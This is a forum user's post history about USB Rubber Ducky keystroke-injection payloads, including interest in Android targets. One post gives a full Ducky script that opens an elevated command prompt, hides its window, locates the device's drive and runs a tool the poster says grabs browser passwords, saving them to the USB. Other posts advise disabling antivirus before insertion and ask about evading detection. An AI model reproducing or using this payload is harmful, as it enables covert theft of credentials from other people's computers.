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Everything posted by jes

  1. @Zer0Co0l Thanks for that. I'll search for ducky android payloads. Do you have any links on those that you can share? Sorry, I didn't mean to be rude, apologies. However, the forums are also supposed to have valuable information, so if you guys don't know a way to accomplish something, don't just say, this absolutely cannot be done, that's not how a hacker's mind should work. The ducky is a keyboard, usually every OS has a way of navigating around the system just by using a keyboard (no need for a mouse or fingers for touching) so I was wondering if there is any good android payloads that do this.
  2. https://play.google.com/store/apps/details?id=jackpal.androidterm&hl=en shell option for android. I was testing it out and it's not the best however. Or maybe I just don't have root access on my android device.
  3. Instead of shutting down opinions right and left, you can just say you don't know or can't think of a way ;) or not say anything at all
  4. Ha yea, it gets caught by Antivirus. You have to disable them before inserting the ducky. Then you're fine.
  5. I wanna be able to do this too. The rubber ducky comes with a USB to android input converter! I haven't been able to properly test if it actually executes as a keyboard like it does when inserted into a computer but this would be awesome if it did. Let's keep this thread active guys!
  6. Sorry forgot to mention that p.exe grabs the browser passwords and you need the twin duck firmware installed to be able to save them onto the USB in this script.
  7. Here is a payload that will run the p.exe using command prompt instead of powershell... I wanted this because not all computers have powershell enabled but they all have command prompt ;) DELAY 1200 GUI R DELAY 300 STRING powershell -NoP -NonI -Exec Bypass "Start-Process cmd -Verb runAs" DELAY 200 ENTER DELAY 500 ALT y DELAY 100 LEFTARROW DELAY 200 DELETE DELAY 200 STRING mode con lines=1 cols=18 DELAY 80 ENTER DELAY 80 STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "QUACK"') do @set duck=%d DELAY 250 ENTER DELAY 200 STRING %duck% ENTER DELAY 150 STRING p.exe /stext pass.txt DELAY 100 ENTER DELAY 2000 STRING exit DELAY 80 ENTER I'm not 100% sure why I need the LEFTARROW or DELETE commands, I'm thinking of taking them out but I also grabbed portions of this from elsewheres of course and they were there. Open to suggestions.
  8. I got the same error for whiterabbit.ps1
  9. Thanks for all this Enzym3. Question about p.exe or this payload in general. Does it get caught by anti-virus programs since it's an .exe?
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